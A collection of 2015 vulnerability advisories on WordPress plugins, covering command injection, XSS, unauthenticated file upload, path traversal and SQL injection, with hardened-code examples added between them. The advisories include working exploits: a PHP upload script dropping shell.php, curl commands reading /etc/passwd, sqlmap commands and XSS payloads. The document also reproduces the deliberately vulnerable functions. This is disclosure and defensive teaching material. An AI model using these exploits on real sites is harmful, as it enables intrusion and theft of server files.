http://www.vapidlabs.internal/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=refresh&json=0&startf=300&lines=6204&backup=backup_20150511_2028_sqlnodrop.tar&excl_manual=/usr/share/wordpress/administrator/backups/.comments

In a shell:
$ cat /tmp/w00t
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Also, $excluded_cmd is reflected (XSS):

http://www.vapidlabs.internal/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=refresh&json=0&startf=800&lines=6204&backup=backup_20150511_2028_sqlnodrop.tar&excl_manual='><script>alert('w00t');</script>

Chrome XSS alert:

The XSS Auditor refused to execute a script in
'http://www.vapidlabs.internal/wp-admin/plugins.php?page=xcloner_show&option=com_…lnodrop.tar&excl_manual=%27%3E%3Cscript%3Ealert(%27w00t%27);%3C/script%3E'
because its source code was found within the request. The auditor was enabled 
as the server sent neither an 'X-XSS-Protection' nor 'Content-Security-Policy' 
header.

The default template has an error with the LM_LOGIN_TEXT field, so just clean 
that out or you'll get a syntax error when trying to execute.
Adding foo");phpinfo();define("foo to the Translation LM_FRONT_* fields and 
then browsing to language/italian.php executes phpinfo();.

CVEID: CVE-2015-4336, CVE-2015-4337, CVE-2015-4338

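The $backup['filepath'] ;rce; injection, the exec() lines quoted from cloner.functions.php and the $excluded_cmd file above are all the same bug: attacker-controlled text is interpolated into one string that /bin/sh -c then parses. The following is an added example, not XCloner's code, showing the vulnerable build next to one that refuses shell metacharacters and quotes every variable token with escapeshellarg(). /bin/echo stands in for mysqldump and "echo INJECTED" for rce so it runs offline and harmlessly; the database name and paths are assumptions.

```php
<?php
// Added example, not XCloner code. build_vulnerable() has the shape of the
// passthru()/exec() calls quoted above: raw config values interpolated into one
// string that /bin/sh -c parses, so a value of "<dir>;rce;" runs rce. The
// $excluded_cmd case is the same bug with the payload read from a file.
// build_hardened() refuses metacharacters and quotes every variable token.
// /bin/echo stands in for mysqldump and "echo INJECTED" for rce, so the demo
// runs offline and is harmless: the echo redirected into a directory just fails.

function build_vulnerable(string $dumpbin, string $db, string $backup_path): string
{
    return "$dumpbin --force --host=\"localhost\" --user=\"root\" --password=\"passwordhere\" "
         . "--default-character-set=\"utf8\" --add-drop-table --skip-lock-tables $db "
         . "> $backup_path/1413225588_-_$db.sql";
}

function build_hardened(string $dumpbin, string $db, string $backup_path): string
{
    // A backup directory never legitimately contains these; refuse, do not "clean".
    if (strpbrk($backup_path, ';|&`$<>(){}' . "\n\r\0") !== false) {
        throw new InvalidArgumentException("backup path contains shell metacharacters: $backup_path");
    }
    if (!preg_match('/^[A-Za-z0-9_]+$/', $db)) {
        throw new InvalidArgumentException("unexpected database name: $db");
    }
    // escapeshellarg() makes each value one single-quoted argument; the password
    // is deliberately absent from the command line (see the process-table issue).
    return escapeshellarg($dumpbin) . ' --force --host=localhost --user=root '
         . '--default-character-set=utf8 --add-drop-table --skip-lock-tables '
         . escapeshellarg($db) . ' > ' . escapeshellarg("$backup_path/1413225588_-_$db.sql");
}

// exec(), passthru() and shell_exec() all go through /bin/sh -c; stdout is returned.
function run(string $cmd): string
{
    return (string) shell_exec($cmd . ' 2>/dev/null');
}

$payload = '/tmp;echo INJECTED;';   // the "Path To Backup:" value, with rce swapped for echo

// sh runs the echo redirected into /tmp (fails, it is a directory), then the
// injected command, then tries to run /1413225588_-_wordpress.sql as a program.
$out = run(build_vulnerable('/bin/echo', 'wordpress', $payload));
echo "vulnerable build, stdout of the injected command: ", json_encode($out), "\n";

try {
    run(build_hardened('/bin/echo', 'wordpress', $payload));
} catch (InvalidArgumentException $e) {
    echo "hardened build: ", $e->getMessage(), "\n";
}
echo "hardened build, clean path:\n  ",
     build_hardened('/usr/bin/mysqldump', 'wordpress', '/var/backups/db'), "\n";
```

Rejecting is preferable to escaping alone because the value is also used as a directory the web server writes into; a path that needs quoting to be safe is not a path the backup job should accept. Where no redirect or pipe is needed, proc_open() with an argv array avoids the shell altogether.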

[FD] Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin

2015-06-10 Thread Larry W. Cashdollar
Title: Remote file upload vulnerability in 
aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-07
Download Site: 
https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
Vendor: Waters Edge Web Design and NetherWorks LLC
Vendor Notified: 2015-06-08
Advisory: http://www.vapid.dhs.org/advisory.php?v=125
Vendor Contact: plug...@wordpress.org
Description: A plugin that integrates the awesome Adobe Creative SDK (formerly 
Aviary) Photo / Image Editor with the Gravity Forms Plugin.
Vulnerability:
There is a remote file upload vulnerability in 
aviary-image-editor-add-on-for-gravity-forms/includes/upload.php: an 
unauthenticated user can upload any file, including a .php file, to the 
system. upload.php doesn't check that the user is authenticated, so a simple 
POST is enough to upload arbitrary code to the server.

In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php 
the code doesn’t check for an authenticated Wordpress user:

1  $max_file_size ){
15  $msg = "File Size is too big.";
16  $error_flag = true;
17  }
18  $extension = strtolower(end(explode('.', $image_file['name'])));
19  $aa_options = get_option('gf_aa_options');
20  $supported_files = $aa_options['supported_file_format'];
21  $supported_files = strtolower($supported_files);
22  if(!$error_flag && $supported_files != '' ){
23$supported_files = explode (',', $supported_files);
24if(!in_array($extension, $supported_files)){
25   $msg = "No Supported file.";
26   $error_flag = true;
27}
28  }
29  if(!$error_flag){
30 $wp_upload_dir = wp_upload_dir();
31 if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){
32  mkdir($wp_upload_dir['basedir'].'/gform_aviary');
33 }
34 $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/';
35 $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/';
36 $file_name = 
$upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name'];
37 if(move_uploaded_file($image_file['tmp_name'], $file_name)){
38 $file_url = 
$upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['name'];
39 }
40 }
41 $return_obj = array('status' => 'success', 'message' => $file_url);
42 echo json_encode($return_obj);
43  }
44 ?>

CVEID: CVE-2015-4455
OSVDB:
Exploit Code:

<?php
/* Uploaded file lands at
   http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
*/
$target_url = 'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php';
$file_name_with_full_path = '/var/www/shell.php';

echo "POST to $target_url $file_name_with_full_path\n";
$post = array('name' => 'shell.php',
              'gf_aviary_file' => class_exists('CURLFile')
                  ? new CURLFile($file_name_with_full_path)
                  : '@' . $file_name_with_full_path);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
echo "\n";
echo $result;
echo "\n";
?>

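An added example (neither VideoWhisper's nor Aviary's code) putting the three extension checks from the advisories above side by side with a strict one. weak_php_check() is the case-sensitive strstr() that .Php and .phtml slip past, weak_tail_check() compares only the last four characters so anything ending in html passes, and weak_aviary_check() reproduces an empty allow-list meaning no check at all. strict_allowed() lower-cases the name, matches the last dot-segment against an allow-list, and refuses an executable segment anywhere in the name because Apache's mod_mime evaluates every segment. The allow-list and the executable-extension list are assumptions, not taken from either plugin.

```php
<?php
// Added example, not VideoWhisper or Aviary plugin code. weak_* reproduce the
// checks quoted in the advisories; strict_allowed() is what an upload handler
// should do. ALLOWED and EXECUTABLE are assumed lists, not from either plugin.

const ALLOWED = ['jpg', 'jpeg', 'png', 'gif', 'txt', 'pdf', 'zip'];
// Anything Apache/PHP or SSI may execute, whichever position it appears in.
const EXECUTABLE = ['php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'pht', 'phps',
                    'phar', 'shtml', 'shtm', 'stm', 'cgi', 'pl', 'htaccess'];

// VideoWhisper: if (strstr($filename,'.php')) exit;   (case-sensitive substring)
function weak_php_check(string $name): bool
{
    return strstr($name, '.php') === false;
}

// VideoWhisper: only the last four characters are compared with the type list.
function weak_tail_check(string $name): bool
{
    $tails = ['html', '.htm', '.jpg', 'jpeg', '.png', '.gif', '.txt', '.pdf', '.zip'];
    return in_array(substr($name, -4), $tails, true);
}

// Aviary: last dot-segment against a comma list, and no list means no check.
function weak_aviary_check(string $name, string $supported_files): bool
{
    if ($supported_files === '') {
        return true;                      // the bug: empty allow-list allows everything
    }
    $parts = explode('.', $name);
    $ext   = strtolower(end($parts));
    return in_array($ext, array_map('trim', explode(',', strtolower($supported_files))), true);
}

function strict_allowed(string $name): bool
{
    if (strpos($name, "\0") !== false) {
        return false;                                    // NUL truncation tricks
    }
    $base = basename(str_replace('\\', '/', $name));     // drop any directory part
    if ($base === '' || $base[0] === '.') {
        return false;                                    // .htaccess and friends
    }
    $parts = explode('.', strtolower($base));
    if (count($parts) < 2) {
        return false;                                    // no extension at all
    }
    $ext = array_pop($parts);
    if (!in_array($ext, ALLOWED, true)) {
        return false;
    }
    // mod_mime evaluates every dot-segment, so shell.php.jpg can still run as PHP.
    foreach ($parts as $segment) {
        if (in_array($segment, EXECUTABLE, true)) {
            return false;
        }
    }
    return true;
}

// Never store under the client's name: a fresh random name keeps the verified
// extension and nothing else, so the attacker controls no byte of the path.
function storage_name(string $name): string
{
    $parts = explode('.', strtolower(basename($name)));
    return bin2hex(random_bytes(8)) . '.' . end($parts);
}

foreach (['photo.jpg', 'shell.php', 'upexp.shtml', 'test.Php.shtml', 'x.phtml',
          'shell.php.jpg', '.htaccess', '../../wp-config.php'] as $f) {
    printf("%-22s strstr:%d tail:%d aviary(empty list):%d strict:%d\n", $f,
           weak_php_check($f), weak_tail_check($f), weak_aviary_check($f, ''),
           strict_allowed($f));
}
echo "stored as: ", storage_name('photo.jpg'), "\n";
```

In a WordPress handler this check belongs after is_user_logged_in() or current_user_can('upload_files') and a check_ajax_referer() nonce check, neither of which vw_upload.php or upload.php perform; wp_check_filetype_and_ext() should then confirm that the file content matches the extension, and the file should be written under storage_name(), not the client's name.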

[FD] Remote file download vulnerability in download-zip-attachments v1.0

2015-06-26 Thread Larry W. Cashdollar
Title: Remote file download vulnerability in download-zip-attachments v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-10
Download Site: https://wordpress.org/plugins/download-zip-attachments/
Vendor: rivenvirus
Vendor Notified: 2015-06-15
Vendor Contact: https://profiles.wordpress.org/rivenvirus/
Advisory: http://www.vapid.dhs.org/advisory.php?v=129
Description: 
Download all attachments from the post into a zip file.

Vulnerability:
download-zip-attachments/download.php makes no check that the download path is 
within the specified upload directory:

forceDownload($tmp_location,false); 
  unlink($tmp_location); 
  exit;
}

CVEID: CVE-2015-4704
OSVDB:
Exploit Code:
http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd


[FD] Arbitrary File download in wordpress plugin wp-instance-rename v1.0

2015-06-26 Thread Larry W. Cashdollar
Title: Arbitrary File download in wordpress plugin wp-instance-rename v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-12
Download Site: https://wordpress.org/plugins/wp-instance-rename/
Vendor: Vlajo
Vendor Notified: 2015-06-12
Advisory: http://www.vapid.dhs.org/advisory.php?v=127
Vendor Contact:
Description: WordPress Rename plugin allows you to easily rename the complete 
WordPress installation. This plugin allows you to rename WordPress database, 
WordPress directory, change every necessary configuration file, easily from one 
page.
Vulnerability:
The code in mysqldump_download.php doesn't check that the requested file is 
within the intended download directory:

try{
$dbname   = $_GET["dbname"];
$dumpfname = $_GET["dumpfname"];
$backup_folder = $_GET["backup_folder"];
}catch (Exception $e){}

if(empty($backup_folder)){
$backup_folder="backup/";
}
echo "$dumpfname";
if (file_exists($dumpfname)) {  
// zip the dump file
$name=$dbname . "_" . date("Y-m-d");
$zipfname = $backup_folder.$name.".zip";
$zip = new ZipArchive();
if($zip->open($zipfname,ZIPARCHIVE::CREATE)) 
{
   $zip->addFile($dumpfname,$dumpfname);
   $zip->close();
}   
// read zip file and send it to standard output
if (file_exists($zipfname)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; 
filename='.basename($zipfname));
flush();
readfile($zipfname);

CVEID: CVE-2015-4703
OSVDB:
Exploit Code:
curl --data "dbname=wp&dumpfname=/etc/passwd&backup_folder=." http://www.example.com/wp-instance-rename/mysqldump_download.php -o p.zip


[FD] SQL Injection in easy2map wordpress plugin v1.24

2015-07-03 Thread Larry W. Cashdollar
Title: SQL Injection in easy2map wordpress plugin v1.24
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.25
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=131
Description: The easiest tool available for creating custom & great-looking 
Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity.
Vulnerability:
The following lines in Function.php use sprintf() to format the queries sent 
to the database; this neither sanitizes the user input nor parameterizes the 
query.

 90 $wpdb->query(sprintf("UPDATE $mapsTable
 91 SET PolyLines = '%s'
 92 WHERE ID = '%s';", $PolyLines, $mapID));

.
.
.
163 $wpdb->query(sprintf("
164 UPDATE $mapsTable
165 SET TemplateID = '%s',
166 MapName = '%s',
167 Settings = '%s',
168 LastInvoked = CURRENT_TIMESTAMP,
169 CSSValues = '%s',
170 CSSValuesList = '%s',
171 CSSValuesHeading = '%s',
172 MapHTML = '%s',
173 IsActive = 1,
174 ThemeID = '%s'
175 WHERE ID = %s;",
176 $Items['mapTemplateName'],
177 $Items['mapName'],
178 urldecode($Items['mapSettingsXML']),
179 urldecode($Items["mapCSSXML"]),
180 urldecode($Items["listCSSXML"]),
181 urldecode($Items["headingCSSXML"]),
182 urldecode($Items["mapHTML"]),
183 $Items['mapThemeName'],
184 $mapID));
185 } else {
186 
187 //this is a map insert
188 if (!$wpdb->query(sprintf("
189 INSERT INTO $mapsTable(
190 TemplateID,
191 MapName,
192 DefaultPinImage,
193 Settings,
194 LastInvoked,
195 PolyLines,
196 CSSValues,
197 CSSValuesList,
198 CSSValuesHeading,
199 MapHTML,
200 IsActive,
201 ThemeID
202 ) VALUES ('%s', '%s', '%s', '%s', 
203 CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, 
'%s');",
204 $Items['mapTemplateName'],
205 $Items['mapName'], str_replace('index.php', '', 
easy2map_get_plugin_url('/index.php')) . "images/map_pins/pins/111.png",
206 urldecode($Items['mapSettingsXML']), '',
207 urldecode($Items["mapCSSXML"]),
208 urldecode($Items["listCSSXML"]),
209 urldecode($Items["headingCSSXML"]),
210 urldecode($Items["mapHTML"]),
211 $Items['mapThemeName']))) 
.
.
267 $wpdb->query(sprintf("
268 UPDATE $mapsTable
269 SET MapName = '%s',
270 LastInvoked = CURRENT_TIMESTAMP,
271 IsActive = 1
272 WHERE ID = %s;", $mapName, $mapID));

In MapPinImageSave.php the map_id value isn't sanitized when creating a 
directory, allowing ../ to create files outside the intended directory:

4 $imagesDirectory = WP_CONTENT_DIR . 
"/uploads/easy2map/images/map_pins/uploaded/" . $_GET["map_id"] . "/";
.
.
11 if (is_uploaded_file($_FILES["pinicon"]['tmp_name'])) {
12 
13 if (!file_exists($imagesDirectory)) {
14 mkdir($imagesDirectory);
15 }

CVEID: CVE-2015-4614 (SQLi), CVE-2015-4616 (../ bug)
OSVDB:
Exploit Code:
$ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie='COOKIE HERE' --level=5 --risk=3

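Why sprintf('%s') is not parameterization, as an added example that is not easy2map's code: an in-memory SQLite database through PDO stands in for $wpdb so it runs without WordPress, with a maps table and two rows constructed here. The payload follows the sqlmap test above, closing the MapName literal with a single quote, and the vulnerable function has the shape of the UPDATE at lines 267 to 272.

```php
<?php
// Added example, not easy2map code. An in-memory SQLite database through PDO
// stands in for $wpdb so this runs without WordPress; the maps table and its
// two rows are constructed here.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE maps (ID INTEGER PRIMARY KEY, MapName TEXT, IsActive INTEGER)');
$pdo->exec("INSERT INTO maps VALUES (1, 'office', 1)");
$pdo->exec("INSERT INTO maps VALUES (2, 'warehouse', 1)");

// Shape of lines 267-272 in Function.php: sprintf('%s') concatenates and quotes nothing.
function rename_vulnerable(PDO $pdo, string $mapName, string $mapID): void
{
    $pdo->exec(sprintf("UPDATE maps SET MapName = '%s', IsActive = 1 WHERE ID = %s;",
                       $mapName, $mapID));
}

// Placeholders: the driver sends the value separately, so it can only ever be data.
// With $wpdb the equivalent is
//   $wpdb->query($wpdb->prepare(
//       "UPDATE $mapsTable SET MapName = %s, IsActive = 1 WHERE ID = %d", $mapName, $mapID));
function rename_safe(PDO $pdo, string $mapName, int $mapID): void
{
    $st = $pdo->prepare('UPDATE maps SET MapName = :name, IsActive = 1 WHERE ID = :id');
    $st->execute([':name' => $mapName, ':id' => $mapID]);
}

function rows(PDO $pdo): array
{
    return $pdo->query('SELECT ID, MapName, IsActive FROM maps ORDER BY ID')
               ->fetchAll(PDO::FETCH_ASSOC);
}

// An editor of map 1 supplies this as the new name. The quote closes the
// literal, the rest rewrites the statement, and "--" comments out the tail,
// so the UPDATE that actually runs targets ID 2 and sets IsActive = 0.
$payload = "x', IsActive = 0 WHERE ID = 2 -- ";

rename_vulnerable($pdo, $payload, '1');
echo "after sprintf() build:\n";
print_r(rows($pdo));

// Reset map 2 and repeat with the parameterized version: the whole payload is
// stored as map 1's name, map 2 is untouched.
$pdo->exec("UPDATE maps SET MapName = 'warehouse', IsActive = 1 WHERE ID = 2");
rename_safe($pdo, $payload, (int) '1');
echo "after prepared statement:\n";
print_r(rows($pdo));
```

The mkdir path in MapPinImageSave.php is the same principle applied to a file system instead of a query: map_id should go through absint() before it becomes a directory name, just as mapID goes through %d in the prepare() call.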

[FD] Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5

2015-07-07 Thread Larry W. Cashdollar
Title: Remote file download vulnerability in wordpress plugin 
wp-ecommerce-shop-styling v2.5
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-05
Download Site: https://wordpress.org/plugins/wp-ecommerce-shop-styling
Vendor: https://profiles.wordpress.org/haet/
Vendor Notified: 2015-07-05, fixed in version 2.6.
Vendor Contact: http://wpshopstyling.com
Description: Customize your WP ecommerce store with HTML mail templates, 
message content, transaction results and PDF invoices with WYSIWYG editor and 
placeholders.
Vulnerability:
The code in ./wp-ecommerce-shop-styling/includes/download.php doesn't sanitize 
user input to prevent sensitive system files from being downloaded.


1 

You'll have to rename the downloaded file (mv -- 
-..-..-..-..-..-..-..-..-etc-passwd passwd), as the download filename is set 
to the requested path.

CVEID: Requested, TBD.
OSVDB: TBD

Exploit Code:
$ curl http://www.example.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd


[FD] Remote file download in Wordpress Plugin mdc-youtube-downloader v2.1.0

2015-07-07 Thread Larry W. Cashdollar
Title: Remote file download in Wordpress Plugin mdc-youtube-downloader v2.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/mdc-youtube-downloader
Vendor: https://profiles.wordpress.org/mukto90/
Vendor Notified: 2015-07-01, removed vulnerable code.
Vendor Contact: n.mu...@gmail.com
Description: MDC YouTube Downloader allows visitors to download YouTube videos 
directly from your WordPress site.
Vulnerability:
The code in mdc-youtube-downloader/includes/download.php doesn't restrict 
access to the local file system, allowing sensitive files to be downloaded:

$file_name = $_GET['file'];

// make sure it's a file before doing anything!
if(is_file($file_name)) {
.
.
.
 switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
case 'pdf': $mime = 'application/pdf'; break;
case 'zip': $mime = 'application/zip'; break;
case 'jpeg':
case 'jpg': $mime = 'image/jpg'; break;
default: $mime = 'application/force-download';
}
header('Pragma: public');   // required
header('Expires: 0');   // no cache
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime 
($file_name)).' GMT');
header('Cache-Control: private',false);
header('Content-Type: '.$mime);
header('Content-Disposition: attachment; 
filename="'.basename($file_name).'"');
header('Content-Transfer-Encoding: binary');
header('Content-Length: '.filesize($file_name));// provide file 
size
header('Connection: close');
readfile($file_name);   // push it out
exit();

CVEID: Requested, TBD.
OSVDB: TBD.
Exploit Code:
$ curl http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd


[FD] Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777

2015-07-10 Thread Larry W. Cashdollar
Title: Remote file download vulnerability in Wordpress Plugin wp-swimteam 
v1.44.10777
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-02
Download Site: https://wordpress.org/plugins/wp-swimteam
Vendor: Mike Walsh www.MichaelWalsh.org
Vendor Notified: 2015-07-02, fixed in v1.45beta3
Vendor Contact: Through website
Advisory: http://www.vapid.dhs.org/advisory.php?v=134
Description: Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to 
run a swim team including registration, volunteer assignments, scheduling, and 
much more.
Vulnerability:
The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input, 
allowing sensitive system files to be downloaded:


 50 $file = urldecode($args['file']) ;
 51 $fh = fopen($file, 'r') or die('Unable to load file, something bad has happened.') ;
 52 
 53 while (!feof($fh))
 54 $txt .= fread($fh, 1024) ;
 55 
 56 //  Clean up the temporary file - permissions
 57 //  may prevent this from succeeding so use the '@'
 58 //  to suppress any messages from PHP.
 59 
 60 @unlink($file) ;
 61 }
 62 
 63 $filename = urldecode($args['filename']) ;
 64 $contenttype = urldecode($args['contenttype']) ;
 65 
 66 // Tell browser to expect a text file of some sort (usually txt or csv)
 67 
 68 header(sprintf('Content-Type: application/%s', $contenttype)) ;
 69 header(sprintf('Content-disposition:  attachment; filename=%s', $filename)) ;
 70 print $txt ;

CVEID:
OSVDB:
Exploit Code:
$ curl "http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"


[FD] SQL Injection in easy2map-photos wordpress plugin v1.09

2015-07-10 Thread Larry W. Cashdollar
Title: SQL Injection in easy2map-photos wordpress plugin v1.09
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map-photos
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.1.0
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=130
Description: Easy2Map Photos is a simple-yet-powerful tool for generating 
great-looking geo-tagged photo galleries.
Vulnerability:
The following lines in includes/Functions.php are vulnerable to SQL injection 
attack because they aren't parameterized and don't sanitize user input.

48 $wpdb->query(sprintf("UPDATE $mapsTable
49 SET PolyLines = '%s'
50 WHERE ID = '%s';", $PolyLines, $mapID));
218 $wpdb->query(sprintf("
219 UPDATE $mapsTable
220 SET TemplateID = '%s',
221 MapName = '%s',
222 Settings = '%s',
223 CSSValues = '%s',
224 CSSValuesPhoto = '%s',
225 CSSValuesMap = '%s',
226 MapHTML = '%s',
227 IsActive = 1
228 WHERE ID = %s;",
229 $_REQUEST['mapTemplateName'],
230 $_REQUEST['mapName'],
231 urldecode($_REQUEST['mapSettingsXML']),
232 urldecode($_REQUEST["parentCSSXML"]),
233 urldecode($_REQUEST["photoCSSXML"]),
234 urldecode($_REQUEST["mapCSSXML"]),
235 urldecode($_REQUEST["mapHTML"]), $mapID));


238 //this is a map insert
239 if (!$wpdb->query(sprintf("
240 INSERT INTO $mapsTable(
241 TemplateID,
242 MapName,
243 DefaultPinImage,
244 Settings,
245 LastInvoked,
246 PolyLines,
247 CSSValues,
248 CSSValuesPhoto,
249 CSSValuesMap,
250 MapHTML,
251 IsActive
252 ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', 0);",
253 $_REQUEST['mapTemplateName'],
254 $_REQUEST['mapName']


331 $wpdb->query(sprintf("
332 UPDATE $mapsTable
333 SET MapName = '%s'
334 IsActive = 1
335 WHERE ID = %s;",
336 $_REQUEST['mapName'],
337 $mapID));

Also

In MapPinImageUpload.php and MapPinIconSave.php this code would allow someone 
to create files outside of the intended upload directory by adding ../../../../ 
path traversal characters:

   if (!file_exists($imagesDirectory)) {
   mkdir($imagesDirectory);
   }

CVEID: CVE-2015-4615, CVE-2015-4617
OSVDB:
Exploit Code:
$ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3


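The sprintf-built UPDATE statements above only look quoted: a '%s' placeholder does nothing about quotes inside the value. The following is an added example, not the plugin's code, written in Python against an in-memory SQLite table named maps (a constructed stand-in for $mapsTable); it runs the same statement shape both ways and shows that a legitimate name containing an apostrophe already breaks the formatted version, which is exactly the opening an injection uses, while the bound-parameter version stores it intact:

```python
import sqlite3

# Added example; the `maps` table and its row are constructed stand-ins for
# the plugin's $mapsTable.


def make_db():
    """In-memory table with the columns the vulnerable UPDATE touches."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE maps (ID INTEGER PRIMARY KEY, MapName TEXT, IsActive INTEGER)")
    conn.execute("INSERT INTO maps VALUES (11, 'draft', 0)")
    return conn


def vulnerable_update(conn, map_id, map_name):
    """Same construction as sprintf("UPDATE ... SET MapName = '%s' ... WHERE ID = %s").

    Wrapping a placeholder in quotes is not escaping: a single quote in the
    value closes the literal and whatever follows is parsed as SQL. The
    unquoted %s for ID is injectable without even needing a quote.
    """
    sql = "UPDATE maps SET MapName = '%s', IsActive = 1 WHERE ID = %s;" % (map_name, map_id)
    conn.execute(sql)


def safe_update(conn, map_id, map_name):
    """Bound parameters: the value never reaches the SQL parser.

    The WordPress equivalent is $wpdb->query($wpdb->prepare(..., $name, $id)).
    """
    conn.execute("UPDATE maps SET MapName = ?, IsActive = 1 WHERE ID = ?;",
                 (map_name, int(map_id)))


def map_name(conn, map_id):
    return conn.execute("SELECT MapName FROM maps WHERE ID = ?", (map_id,)).fetchone()[0]


def compare(name):
    """Run both updates on fresh tables and report what each one stored."""
    out = {}
    conn = make_db()
    try:
        vulnerable_update(conn, 11, name)
        out["vulnerable"] = map_name(conn, 11)
    except sqlite3.OperationalError:
        out["vulnerable"] = "syntax error"   # the quote broke the statement
    conn = make_db()
    safe_update(conn, 11, name)
    out["safe"] = map_name(conn, 11)
    return out
```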

[FD] Remote file upload vulnerability & SQLi in wordpress plugin wp-powerplaygallery v3.3

2015-07-13 Thread Larry W. Cashdollar
Title: Remote file upload vulnerability & SQLi in wordpress plugin 
wp-powerplaygallery v3.3
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-27
Download Site: https://wordpress.org/plugins/wp-powerplaygallery
Vendor: WP SlideShow
Vendor Notified: 2015-06-29
Advisory: http://www.vapid.dhs.org/advisory.php?v=132
Vendor Contact: plug...@wordpress.org
Description: This is the best gallery for touch screens. It is fully touch 
enabled with great features. This gallery is compatible with iPhone and iPad. 
It also allows us to use it as a widget. You can also enable this Powerplay 
Gallery on your wordpress site by placing a code snippet in your template (.php) 
files. It shows a flash gallery for desktops and a touch enabled version for iPad 
and iPhone.
Vulnerability:
1. Ability to create directories outside of the upload path by using ../:
Lines 56-59 of upload.php:

56 // Create target dir
57 if (!file_exists($targetDir)) {
58 @mkdir($targetDir);
59 }  

2. Arbitrary file uploads to a path in the web root directory:
Lines 138-160 of uploads.php don’t verify what types of files are allowed or 
where they should be placed:

138 // Open temp file
139 if (!$out = @fopen("{$filePath}.part", $chunks ? "ab" : "wb")) {
140 die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" : "id"}');
141 }
142 
143 if (!empty($_FILES)) {
144 if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) {
145 die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."}, "id" : "id"}');
146 }
147 
148 // Read binary input stream and append it to temp file
149 if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
150 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
151 }
152 } else {
153 if (!$in = @fopen("php://input", "rb")) {
154 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
155 }
156 }
157 
158 while ($buff = fread($in, 4096)) {
159 fwrite($out, $buff);
160 }

3. SQL injection 
Lines 131-135 of upload.php fail to handle user input appropriately, either by 
sanitizing or parameterizing it. Injection points are any GET/POST to albumid or name.

131 $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` )
132   VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST['name']."',1,'','NULL')";
133 
134   $wpdb->query($query);
135 

CVEID:
OSVDB:
Exploit Code:
http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big
->301 exists else 404 doesn't.
shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php
